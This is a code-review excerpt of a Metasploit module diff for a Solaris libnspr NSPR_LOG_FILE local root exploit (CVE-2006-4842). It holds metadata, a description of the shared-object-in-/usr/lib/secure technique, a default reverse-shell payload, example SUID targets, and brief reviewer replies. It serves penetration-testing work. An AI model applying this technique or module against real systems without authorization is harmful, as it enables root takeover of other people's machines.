modules/exploits/solaris/local/libnspr_nspr_log_file_priv_esc.rb

```diff
@@ -0,0 +1,219 @@
+    super(update_info(info,
+      'Name'           => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
+      'Description'    => %q{
+        This module exploits an arbitrary file write vulnerability in the
+        Netscape Portable Runtime library (libnspr) on Solaris which allows
+        users to gain root privileges.
+
+        libnspr versions prior to 4.6.3 allow users to specify a log file with
+        the `NSPR_LOG_FILE` environment variable. The log file is created with
+        the privileges of the running process, resulting in privilege escalation
+        when used in combination with a SUID executable.
+
+        This module writes a shared object to the trusted library directory
+        `/usr/lib/secure` and runs the specified SUID binary with the shared
+        object loaded using the `LD_LIBRARY_PATH` environment variable.
+
+        This module has been tested successfully with libnspr version 4.5.1
+        on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
+      },
+      'References'     =>
+        [
+          ['BID', '20471'],
+          ['CVE', '2006-4842'],
+          ['EDB', '2543'],
+          ['EDB', '2569'],
+          ['EDB', '2641'],
+          ['URL', 'https://securitytracker.com/id/1017050'],
+          ['URL', 'https://securitytracker.com/id/1017051'],
+          ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
+          ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
+          ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
+        ],
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'iDefense',     # Discovery
+          'Marco Ivaldi', # Exploit
+          'Brendan Coles' # Metasploit
+        ],
+      'DisclosureDate' => 'Oct 11 2006',
+      'Privileged'     => true,
+      'Platform'       => ['solaris'],
+      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
+      'Targets'        => [['Auto', {}]],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
+          'WfsDelay'    => 10,
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      # Some useful example SUID executables:
+      # * /usr/bin/cancel
+      # * /usr/bin/chkey
+      # * /usr/bin/lp
+      # * /usr/bin/lpset
+      # * /usr/bin/lpstat
+      # * /usr/lib/lp/bin/netpr
+      # * /usr/sbin/lpmove
+      OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel']),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH']
+  end
+
+  def is_writable?(path)
```

Comment:
Is it worth putting this in the library? Maybe not. `test` can do a billion things.

Reply:
It should probably live in a `Post::File` API. I was going to add it, but decided against it, because ~Windows~ reasons.

Reply:
Meh. Don't super care right now.

Reply:
I'm gonna mark this as resolved. You did remind me that I forgot to check if `WritableDir` is writable. Fixed now.